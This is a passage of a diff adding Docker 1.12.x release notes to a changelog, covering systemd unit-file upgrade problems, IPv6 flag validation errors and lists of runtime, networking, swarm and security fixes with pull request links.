[#24533](https://github.com/docker/docker/pull/24533) +- Deprecate "top-level" network information in `NetworkSettings` [#28437](https://github.com/docker/docker/pull/28437) + +## 1.12.6 (2017-01-10) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or +that the IPAM driver can provide one when you specify the `--ipv6` option. + +If you are currently using the `--ipv6` option _without_ specifying the +`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the +following message: + +```none +Error starting daemon: Error initializing network controller: Error creating + default "bridge" network: failed to parse pool request + for address space "LocalDefault" pool " subpool ": + could not find an available, non-overlapping IPv6 address + pool among the defaults to assign to the network +``` + +To resolve this error, either remove the `--ipv6` flag (to preserve the same +behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the +value of the `--fixed-cidr-v6` flag. + +In a similar way, if you specify the `--ipv6` flag when creating a network +with the default IPAM driver, without providing an IPv6 `--subnet`, network +creation will fail with the following message: + +```none +Error response from daemon: failed to parse pool request for address space + "LocalDefault" pool "" subpool "": could not find an + available, non-overlapping IPv6 address pool among + the defaults to assign to the network +``` + +To resolve this, either remove the `--ipv6` flag (to preserve the same behavior +as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the +`--subnet` flag. + +The network network creation will instead succeed if you use an external IPAM driver +which supports automatic allocation of IPv6 subnets. + +### Runtime + +- Fix runC privilege escalation (CVE-2016-9962) + +## 1.12.5 (2016-12-15) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**NOTE**: Docker 1.12.5 will correctly validate that either an IPv6 subnet is provided or +that the IPAM driver can provide one when you specify the `--ipv6` option. + +If you are currently using the `--ipv6` option _without_ specifying the +`--fixed-cidr-v6` option, the Docker daemon will refuse to start with the +following message: + +```none +Error starting daemon: Error initializing network controller: Error creating + default "bridge" network: failed to parse pool request + for address space "LocalDefault" pool " subpool ": + could not find an available, non-overlapping IPv6 address + pool among the defaults to assign to the network +``` + +To resolve this error, either remove the `--ipv6` flag (to preserve the same +behavior as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the +value of the `--fixed-cidr-v6` flag. + +In a similar way, if you specify the `--ipv6` flag when creating a network +with the default IPAM driver, without providing an IPv6 `--subnet`, network +creation will fail with the following message: + +```none +Error response from daemon: failed to parse pool request for address space + "LocalDefault" pool "" subpool "": could not find an + available, non-overlapping IPv6 address pool among + the defaults to assign to the network +``` + +To resolve this, either remove the `--ipv6` flag (to preserve the same behavior +as in Docker 1.12.3 and earlier), or provide an IPv6 subnet as the value of the +`--subnet` flag. + +The network network creation will instead succeed if you use an external IPAM driver +which supports automatic allocation of IPv6 subnets. + +### Runtime + +- Fix race on sending stdin close event [#29424](https://github.com/docker/docker/pull/29424) + +### Networking + +- Fix panic in docker network ls when a network was created with `--ipv6` and no ipv6 `--subnet` in older docker versions [#29416](https://github.com/docker/docker/pull/29416) + +### Contrib + +- Fix compilation on Darwin [#29370](https://github.com/docker/docker/pull/29370) + +## 1.12.4 (2016-12-12) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + + +### Runtime + +- Fix issue where volume metadata was not removed [#29083](https://github.com/docker/docker/pull/29083) +- Asynchronously close streams to prevent holding container lock [#29050](https://github.com/docker/docker/pull/29050) +- Fix selinux labels for newly created container volumes [#29050](https://github.com/docker/docker/pull/29050) +- Remove hostname validation [#28990](https://github.com/docker/docker/pull/28990) +- Fix deadlocks caused by IO races [#29095](https://github.com/docker/docker/pull/29095) [#29141](https://github.com/docker/docker/pull/29141) +- Return an empty stats if the container is restarting [#29150](https://github.com/docker/docker/pull/29150) +- Fix volume store locking [#29151](https://github.com/docker/docker/pull/29151) +- Ensure consistent status code in API [#29150](https://github.com/docker/docker/pull/29150) +- Fix incorrect opaque directory permission in overlay2 [#29093](https://github.com/docker/docker/pull/29093) +- Detect plugin content and error out on `docker pull` [#29297](https://github.com/docker/docker/pull/29297) + +### Swarm Mode + +* Update Swarmkit [#29047](https://github.com/docker/docker/pull/29047) + - orchestrator/global: Fix deadlock on updates [docker/swarmkit#1760](https://github.com/docker/swarmkit/pull/1760) + - on leader switchover preserve the vxlan id for existing networks [docker/swarmkit#1773](https://github.com/docker/swarmkit/pull/1773) +- Refuse swarm spec not named "default" [#29152](https://github.com/docker/docker/pull/29152) + +### Networking + +* Update libnetwork [#29004](https://github.com/docker/docker/pull/29004) [#29146](https://github.com/docker/docker/pull/29146) + - Fix panic in embedded DNS [docker/libnetwork#1561](https://github.com/docker/libnetwork/pull/1561) + - Fix unmarhalling panic when passing --link-local-ip on global scope network [docker/libnetwork#1564](https://github.com/docker/libnetwork/pull/1564) + - Fix panic when network plugin returns nil StaticRoutes [docker/libnetwork#1563](https://github.com/docker/libnetwork/pull/1563) + - Fix panic in osl.(*networkNamespace).DeleteNeighbor [docker/libnetwork#1555](https://github.com/docker/libnetwork/pull/1555) + - Fix panic in swarm networking concurrent map read/write [docker/libnetwork#1570](https://github.com/docker/libnetwork/pull/1570) + * Allow encrypted networks when running docker inside a container [docker/libnetwork#1502](https://github.com/docker/libnetwork/pull/1502) + - Do not block autoallocation of IPv6 pool [docker/libnetwork#1538](https://github.com/docker/libnetwork/pull/1538) + - Set timeout for netlink calls [docker/libnetwork#1557](https://github.com/docker/libnetwork/pull/1557) + - Increase networking local store timeout to one minute [docker/libkv#140](https://github.com/docker/libkv/pull/140) + - Fix a panic in libnetwork.(*sandbox).execFunc [docker/libnetwork#1556](https://github.com/docker/libnetwork/pull/1556) + - Honor icc=false for internal networks [docker/libnetwork#1525](https://github.com/docker/libnetwork/pull/1525) + +### Logging + +* Update syslog log driver [#29150](https://github.com/docker/docker/pull/29150) + +### Contrib + +- Run "dnf upgrade" before installing in fedora [#29150](https://github.com/docker/docker/pull/29150) +- Add build-date back to RPM packages [#29150](https://github.com/docker/docker/pull/29150) +- deb package filename changed to include distro to distinguish between distro code names [#27829](https://github.com/docker/docker/pull/27829) + +## 1.12.3 (2016-10-26) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + + +### Runtime + +- Fix ambient capability usage in containers (CVE-2016-8867) [#27610](https://github.com/docker/docker/pull/27610) +- Prevent a deadlock in libcontainerd for Windows [#27136](https://github.com/docker/docker/pull/27136) +- Fix error reporting in CopyFileWithTar [#27075](https://github.com/docker/docker/pull/27075) +* Reset health status to starting when a container is restarted [#27387](https://github.com/docker/docker/pull/27387) +* Properly handle shared mount propagation in storage directory [#27609](https://github.com/docker/docker/pull/27609) +- Fix docker exec [#27610](https://github.com/docker/docker/pull/27610) +- Fix backward compatibility with containerd’s events log [#27693](https://github.com/docker/docker/pull/27693) + +### Swarm Mode + +- Fix conversion of restart-policy [#27062](https://github.com/docker/docker/pull/27062) +* Update Swarmkit [#27554](https://github.com/docker/docker/pull/27554) + * Avoid restarting a task that has already been restarted [docker/swarmkit#1305](https://github.com/docker/swarmkit/pull/1305) + * Allow duplicate published ports when they use different protocols [docker/swarmkit#1632](https://github.com/docker/swarmkit/pull/1632) + * Allow multiple randomly assigned published ports on service [docker/swarmkit#1657](https://github.com/docker/swarmkit/pull/1657) + - Fix panic when allocations happen at init time [docker/swarmkit#1651](https://github.com/docker/swarmkit/pull/1651) + +### Networking + +* Update libnetwork [#27559](https://github.com/docker/docker/pull/27559) + - Fix race in serializing sandbox to string [docker/libnetwork#1495](https://github.com/docker/libnetwork/pull/1495) + - Fix race during deletion [docker/libnetwork#1503](https://github.com/docker/libnetwork/pull/1503) + * Reset endpoint port info on connectivity revoke in bridge driver [docker/libnetwork#1504](https://github.com/docker/libnetwork/pull/1504) + - Fix a deadlock in networking code [docker/libnetwork#1507](https://github.com/docker/libnetwork/pull/1507) + - Fix a race in load balancer state [docker/libnetwork#1512](https://github.com/docker/libnetwork/pull/1512) + +### Logging + +* Update fluent-logger-golang to v1.2.1 [#27474](https://github.com/docker/docker/pull/27474) + +### Contrib + +* Update buildtags for armhf ubuntu-trusty [#27327](https://github.com/docker/docker/pull/27327) +* Add AppArmor to runc buildtags for armhf [#27421](https://github.com/docker/docker/pull/27421) + +## 1.12.2 (2016-10-11) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + + +### Runtime + +- Fix a panic due to a race condition filtering `docker ps` [#26049](https://github.com/docker/docker/pull/26049) +* Implement retry logic to prevent "Unable to remove filesystem" errors when using the aufs storage driver [#26536](https://github.com/docker/docker/pull/26536) +* Prevent devicemapper from removing device symlinks if `dm.use_deferred_removal` is enabled [#24740](https://github.com/docker/docker/pull/24740) +- Fix an issue where the CLI did not return correct exit codes if a command was run with invalid options [#26777](https://github.com/docker/docker/pull/26777) +- Fix a panic due to a bug in stdout / stderr processing in health checks [#26507](https://github.com/docker/docker/pull/26507) +- Fix exec's children handling [#26874](https://github.com/docker/docker/pull/26874) +- Fix exec form of HEALTHCHECK CMD [#26208](https://github.com/docker/docker/pull/26208) + +### Networking + +- Fix a daemon start panic on armv5 [#24315](https://github.com/docker/docker/issues/24315) +* Vendor libnetwork [#26879](https://github.com/docker/docker/pull/26879) [#26953](https://github.com/docker/docker/pull/26953) + * Avoid returning early on agent join failures [docker/libnetwork#1473](https://github.com/docker/libnetwork/pull/1473) + - Fix service published port cleanup issues [docker/libetwork#1432](https://github.com/docker/libnetwork/pull/1432) [docker/libnetwork#1433](https://github.com/docker/libnetwork/pull/1433) + * Recover properly from transient gossip failures [docker/libnetwork#1446](https://github.com/docker/libnetwork/pull/1446) + * Disambiguate node names known to gossip cluster to avoid node name collision [docker/libnetwork#1451](https://github.com/docker/libnetwork/pull/1451) + * Honor user provided listen address for gossip [docker/libnetwork#1460](https://github.com/docker/libnetwork/pull/1460) + * Allow reachability via published port across services on the same host [docker/libnetwork#1398](https://github.com/docker/libnetwork/pull/1398) + * Change the ingress sandbox name from random id to just `ingress_sbox` [docker/libnetwork#1449](https://github.com/docker/libnetwork/pull/1449) + - Disable service discovery in ingress network [docker/libnetwork#1489](https://github.com/docker/libnetwork/pull/1489) + +### Swarm Mode + +* Fix remote detection of a node's address when it joins the cluster [#26211](https://github.com/docker/docker/pull/26211) +* Vendor SwarmKit [#26765](https://github.com/docker/docker/pull/26765) + * Bounce session after failed status update [docker/swarmkit#1539](https://github.com/docker/swarmkit/pull/1539) + - Fix possible raft deadlocks [docker/swarmkit#1537](https://github.com/docker/swarmkit/pull/1537) + - Fix panic and endpoint leak when a service is updated with no endpoints [docker/swarmkit#1481](https://github.com/docker/swarmkit/pull/1481) + * Produce an error if the same port is published twice on `service create` or `service update` [docker/swarmkit#1495](https://github.com/docker/swarmkit/pull/1495) + - Fix an issue where changes to a service were not detected, resulting in the service not being updated [docker/swarmkit#1497](https://github.com/docker/swarmkit/pull/1497) + - Do not allow service creation on ingress network [docker/swarmkit#1600](https://github.com/docker/swarmkit/pull/1600) + +### Contrib + +* Update the debian sysv-init script to use `dockerd` instead of `docker daemon` [#25869](https://github.com/docker/docker/pull/25869) +* Improve stability when running the docker client on MacOS Sierra [#26875](https://github.com/docker/docker/pull/26875) +- Fix installation on debian stretch [#27184](https://github.com/docker/docker/pull/27184) + +### Windows + +- Fix an issue where arrow-navigation did not work when running the docker client in ConEmu [#25578](https://github.com/docker/docker/pull/25578) + +## 1.12.1 (2016-08-18) + +**IMPORTANT**: Docker 1.12 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + + +### Client + +* Add `Joined at` information in `node inspect --pretty` [#25512](https://github.com/docker/docker/pull/25512) +- Fix a crash on `service inspect` [#25454](https://github.com/docker/docker/pull/25454) +- Fix issue preventing `service update --env-add` to work as intended [#25427](https://github.com/docker/docker/pull/25427) +- Fix issue preventing `service update --publish-add` to work as intended [#25428](https://github.com/docker/docker/pull/25428) +- Remove `service update --network-add` and `service update --network-rm` flags + because this feature is not yet implemented in 1.12, but was inadvertently added + to the client in 1.12.0 [#25646](https://github.com/docker/docker/pull/25646) + +### Contrib + ++ Official ARM installation for Debian Jessie, Ubuntu Trusty, and Raspbian Jessie [#24815](https://github.com/docker/docker/pull/24815) [#25591](https://github.com/docker/docker/pull/25637) +- Add selinux policy per distro/version, fixing issue preventing successful installation on Fedora 24, and Oracle Linux [#25334](https://github.com/docker/docker/pull/25334) [#25593](https://github.com/docker/docker/pull/25593) + +### Networking + +- Fix issue that prevented containers to be accessed by hostname with Docker overlay driver in Swarm Mode [#25603](https://github.com/docker/docker/pull/25603) [#25648](https://github.com/docker/docker/pull/25648) +- Fix random network issues on service with published port [#25603](https://github.com/docker/docker/pull/25603) +- Fix unreliable inter-service communication after scaling down and up [#25603](https://github.com/docker/docker/pull/25603) +- Fix issue where removing all tasks on a node and adding them back breaks connectivity with other services [#25603](https://github.com/docker/docker/pull/25603) +- Fix issue where a task that fails to start results in a race, causing a `network xxx not found` error that masks the actual error [#25550](https://github.com/docker/docker/pull/25550) +- Relax validation of SRV records for external services that use SRV records not formatted according to RFC 2782 [#25739](https://github.com/docker/docker/pull/25739) + +### Plugins (experimental) + +* Make daemon events listen for plugin lifecycle events [#24760](https://github.com/docker/docker/pull/24760) +* Check for plugin state before enabling plugin [#25033](https://github.com/docker/docker/pull/25033) +- Remove plugin root from filesystem on `plugin rm` [#25187](https://github.com/docker/docker/pull/25187) +- Prevent deadlock when more than one plugin is installed [#25384](https://github.com/docker/docker/pull/25384) + +### Runtime + +* Mask join tokens in daemon logs [#25346](https://github.com/docker/docker/pull/25346) +- Fix `docker ps --filter` causing the results to no longer be sorted by creation time [#25387](https://github.com/docker/docker/pull/25387) +- Fix various crashes [#25053](https://github.com/docker/docker/pull/25053) + +### Security + +* Add `/proc/timer_list` to the masked paths list to prevent information leak from the host [#25630](https://github.com/docker/docker/pull/25630) +* Allow systemd to run with only `--cap-add SYS_ADMIN` rather than having to also add `--cap-add DAC_READ_SEARCH` or disabling seccomp filtering [#25567](https://github.com/docker/docker/pull/25567) + +### Swarm + +- Fix an issue where the swarm can get stuck electing a new leader after quorum is lost [#25055](https://github.com/docker/docker/issues/25055) +- Fix unwanted rescheduling of containers after a leader failover [#25017](https://github.com/docker/docker/issues/25017) +- Change swarm root CA key to P256 curve [swarmkit#1376](https://github.com/docker/swarmkit/pull/1376) +- Allow forced removal of a node from a swarm [#25159](https://github.com/docker/docker/pull/25159) +- Fix connection leak when a node leaves a swarm [swarmkit/#1277](https://github.com/docker/swarmkit/pull/1277) +- Backdate swarm certificates by one hour to tolerate more clock skew [swarmkit/#1243](https://github.com/docker/swarmkit/pull/1243) +- Avoid high CPU use with many unschedulable tasks [swarmkit/#1287](https://github.com/docker/swarmkit/pull/1287) +- Fix issue with global tasks not starting up [swarmkit/#1295](https://github.com/docker/swarmkit/pull/1295) +- Garbage collect raft logs [swarmkit/#1327](https://github.com/docker/swarmkit/pull/1327) + +### Volume + +- Persist local volume options after a daemon restart [#25316](https://github.com/docker/docker/pull/25316) +- Fix an issue where the mount ID was not returned on volume unmount [#25333](https://github.com/docker/docker/pull/25333) +- Fix an issue where a volume mount could inadvertently create a bind mount [#25309](https://github.com/docker/docker/pull/25309) +- `docker service create --mount type=bind,...` now correctly validates if the source path exists, instead of creating it [#25494](https://github.com/docker/docker/pull/25494) + +## 1.12.0 (2016-07-28) + + +**IMPORTANT**: Docker 1.12.0 ships with an updated systemd unit file for rpm +based installs (which includes RHEL, Fedora, CentOS, and Oracle Linux 7). When +upgrading from an older version of docker, the upgrade process may not +automatically install the updated version of the unit file, or fail to start +the docker service if; + +- the systemd unit file (`/usr/lib/systemd/system/docker.service`) contains local changes, or +- a systemd drop-in file is present, and contains `-H fd://` in the `ExecStart` directive + +Starting the docker service will produce an error: + + Failed to start docker.service: Unit docker.socket failed to load: No such file or directory. + +or + + no sockets found via socket activation: make sure the service was started by systemd. + +To resolve this: + +- Backup the current version of the unit file, and replace the file with the + [version that ships with docker 1.12](https://raw.githubusercontent.com/docker/docker/v1.12.0/contrib/init/systemd/docker.service.rpm) +- Remove the `Requires=docker.socket` directive from the `/usr/lib/systemd/system/docker.service` file if present +- Remove `-H fd://` from the `ExecStart` directive (both in the main unit file, and in any drop-in files present). + +After making those changes, run `sudo systemctl daemon-reload`, and `sudo +systemctl restart docker` to reload changes and (re)start the docker daemon. + +**IMPORTANT**: With Docker 1.12, a Linux docker installation now has two +additional binaries; `dockerd`, and `docker-proxy`. If you have scripts for +installing docker, please make sure to update them accordingly. + +### Builder + ++ New `HEALTHCHECK` Dockerfile instruction to support user-defined healthchecks [#23218](https://github.com/docker/docker/pull/23218) ++ New `SHELL` Dockerfile instruction to specify the default shell when using the shell form for commands in a Dockerfile [#22489](https://github.com/docker/docker/pull/22489) ++ Add `#escape=` Dockerfile directive to support platform-specific parsing of file paths in Dockerfile [#22268](https://github.com/docker/docker/pull/22268) ++ Add support for comments in `.dockerignore` [#23111](https://github.com/docker/docker/pull/23111) +* Support for UTF-8 in Dockerfiles [#23372](https://github.com/docker/docker/pull/23372) +* Skip UTF-8 BOM bytes from `Dockerfile` and `.dockerignore` if exist [#23234](https://github.com/docker/docker/pull/23234) +* Windows: support for `ARG` to match Linux [#22508](https://github.com/docker/docker/pull/22508) +- Fix error message when building using a daemon with the bridge network disabled [#22932](https://github.com/docker/docker/pull/22932) + +### Contrib + +* Enable seccomp for Centos 7 and Oracle Linux 7 [#22344](https://github.com/docker/docker/pull/22344) +- Remove MountFlags in systemd unit to allow shared mount propagation [#22806](https://github.com/docker/docker/pull/22806) + +### Distribution + ++ Add `--max-concurrent-downloads` and `--max-concurrent-uploads` daemon flags useful for situations where network connections don't support multiple downloads/uploads [#22445](https://github.com/docker/docker/pull/22445) +* Registry operations now honor the `ALL_PROXY` environment variable [#22316](https://github.com/docker/docker/pull/22316) +* Provide more information to the user on `docker load` [#23377](https://github.com/docker/docker/pull/23377) +* Always save registry digest metadata about images pushed and pulled [#23996](https://github.com/docker/docker/pull/23996) + +### Logging + ++ Syslog logging driver now supports DGRAM sockets [#21613](https://github.com/docker/docker/pull/21613) ++ Add `--details` option to `docker logs` to also display log tags [#21889](https://github.com/docker/docker/pull/21889) ++ Enable syslog logger to have access to env and labels [#21724](https://github.com/docker/docker/pull/21724) ++ An additional syslog-format option `rfc5424micro` to allow microsecond resolution in syslog timestamp [#21844](https://github.com/docker/docker/pull/21844) +* Inherit the daemon log options when creating containers [#21153](https://github.com/docker/docker/pull/21153) +* Remove `docker/` prefix from log messages tag and replace it with `{{.DaemonName}}` so that users have the option of changing the prefix [#22384](https://github.com/docker/docker/pull/22384) + +### Networking + ++ Built-in Virtual-IP based internal and ingress load-balancing using IPVS [#23361](https://github.com/docker/docker/pull/23361) ++ Routing Mesh using ingress overlay network [#23361](https://github.com/docker/docker/pull/23361) ++ Secured multi-host overlay networking using encrypted control-plane and Data-plane [#23361](https://github.com/docker/docker/pull/23361) ++ MacVlan driver is out of experimental [#23524](https://github.com/docker/docker/pull/23524) ++ Add `driver` filter to `network ls` [#22319](https://github.com/docker/docker/pull/22319) ++ Adding `network` filter to `docker ps --filter` [#23300](https://github.com/docker/docker/pull/23300) ++ Add `--link-local-ip` flag to `create`, `run` and `network connect` to specify a container's link-local address [#23415](https://github.com/docker/docker/pull/23415) ++ Add network label filter support [#21495](https://github.com/docker/docker/pull/21495) +* Removed dependency on external KV-Store for Overlay networking in Swarm-Mode [#23361](https://github.com/docker/docker/pull/23361) +* Add container's short-id as default network alias [#21901](https://github.com/docker/docker/pull/21901) +* `run` options `--dns` and `--net=host` are no longer mutually exclusive [#22408](https://github.com/docker/docker/pull/22408) +- Fix DNS issue when renaming containers with generated names [#22716](https://github.com/docker/docker/pull/22716) +- Allow both `network inspect -f {{.Id}}` and `network inspect -f {{.ID}}` to address inconsistency with inspect output [#23226](https://github.com/docker/docker/pull/23226) + +### Plugins (experimental) + ++ New `plugin` command to manager plugins with `install`, `enable`, `disable`, `rm`, `inspect`, `set` subcommands [#23446](https://github.com/docker/docker/pull/23446) + +### Remote API (v1.24) & Client + ++ Split the binary into two: `docker` (client) and `dockerd` (daemon) [#20639](https://github.com/docker/docker/pull/20639) ++ Add `before` and `since` filters to `docker images --filter` [#22908](https://github.com/docker/docker/pull/22908) ++ Add `--limit` option to `docker search` [#23107](https://github.com/docker/docker/pull/23107) ++ Add `--filter` option to `docker search` [#22369](https://github.com/docker/docker/pull/22369) ++ Add security options to `docker info` output [#21172](https://github.com/docker/docker/pull/21172) [#23520](https://github.com/docker/docker/pull/23520) ++ Add insecure registries to `docker info` output [#20410](https://github.com/docker/docker/pull/20410) ++ Extend Docker authorization with TLS user information [#21556](https://github.com/docker/docker/pull/21556) ++ devicemapper: expose Mininum Thin Pool Free Space through `docker info` [#21945](https://github.com/docker/docker/pull/21945) +* API now returns a JSON object when an error occurs making it more consistent [#22880](https://github.com/docker/docker/pull/22880) +- Prevent `docker run -i --restart` from hanging on exit [#22777](https://github.com/docker/docker/pull/22777) +- Fix API/CLI discrepancy on hostname validation [#21641](https://github.com/docker/docker/pull/21641) +- Fix discrepancy in the format of sizes in `stats` from HumanSize to BytesSize [#21773](https://github.com/docker/docker/pull/21773) +- authz: when request is denied return forbbiden exit code (403) [#22448](https://github.com/docker/docker/pull/22448) +- Windows: fix tty-related displaying issues [#23878](https://github.com/docker/docker/pull/23878) + +### Runtime + ++ Split the userland proxy to a separate binary (`docker-proxy`) [#23312](https://github.com/docker/docker/pull/23312) ++ Add `--live-restore` daemon flag to keep containers running when daemon shuts down, and regain control on startup [#23213](https://github.com/docker/docker/pull/23213) ++ Ability to add OCI-compatible runtimes (via `--add-runtime` daemon flag) and select one with `--runtime` on `create` and `run` [#22983](https://github.com/docker/docker/pull/22983) ++ New `overlay2` graphdriver for Linux 4.0+ with multiple lower directory support [#22126](https://github.com/docker/docker/pull/22126) ++ New load/save image events [#22137](https://github.com/docker/docker/pull/22137) ++ Add support for reloading daemon configuration through systemd [#22446](https://github.com/docker/docker/pull/22446) ++ Add disk quota support for btrfs [#19651](https://github.com/docker/docker/pull/19651) ++ Add disk quota support for zfs [#21946](https://github.com/docker/docker/pull/21946) ++ Add support for `docker run --pid=container:` [#22481](https://github.com/docker/docker/pull/22481) ++ Align default seccomp profile with selected capabilities [#22554](https://github.com/docker/docker/pull/22554) ++ Add a `daemon reload` event when the daemon reloads its configuration [#22590](https://github.com/docker/docker/pull/22590) ++ Add `trace` capability in the pprof profiler to show execution traces in binary form [#22715](https://github.com/docker/docker/pull/22715) ++ Add a `detach` event [#22898](https://github.com/docker/docker/pull/22898) ++ Add support for setting sysctls with `--sysctl` [#19265](https://github.com/docker/docker/pull/19265) ++ Add `--storage-opt` flag to `create` and `run` allowing to set `size` on devicemapper [#19367](https://github.com/docker/docker/pull/19367) ++ Add `--oom-score-adjust` daemon flag with a default value of `-500` making the daemon less likely to be killed before containers [#24516](https://github.com/docker/docker/pull/24516) +* Undeprecate the `-c` short alias of `--cpu-shares` on `run`, `build`, `create`, `update` [#22621](https://github.com/docker/docker/pull/22621) +* Prevent from using aufs and overlay graphdrivers on an eCryptfs mount [#23121](https://github.com/docker/docker/pull/23121) +- Fix issues with tmpfs mount ordering [#22329](https://github.com/docker/docker/pull/22329) +- Created containers are no longer listed on `docker ps -a -f exited=0` [#21947](https://github.com/docker/docker/pull/21947) +- Fix an issue where containers are stuck in a "Removal In Progress" state [#22423](https://github.com/docker/docker/pull/22423) +- Fix bug that was returning an HTTP 500 instead of a 400 when not specifying a command on run/create [#22762](https://github.com/docker/docker/pull/22762) +- Fix bug with `--detach-keys` whereby input matching a prefix of the detach key was not preserved [#22943](https://github.com/docker/docker/pull/22943) +- SELinux labeling is now disabled when using `--privileged` mode [#22993](https://github.com/docker/docker/pull/22993) +- If volume-mounted into a container, `/etc/hosts`, `/etc/resolv.conf`, `/etc/hostname` are no longer SELinux-relabeled [#22993](https://github.com/docker/docker/pull/22993) +- Fix inconsistency in `--tmpfs` behavior regarding mount options [#22438](https://github.com/docker/docker/pull/22438) +- Fix an issue where daemon hangs at startup [#23148](https://github.com/docker/docker/pull/23148) +- Ignore SIGPIPE events to prevent journald restarts to crash docker in some cases [#22460](https://github.com/docker/docker/pull/22460) +- Containers are not removed from stats list on error [#20835](https://github.com/docker/docker/pull/20835) +- Fix `on-failure` restart policy when daemon restarts 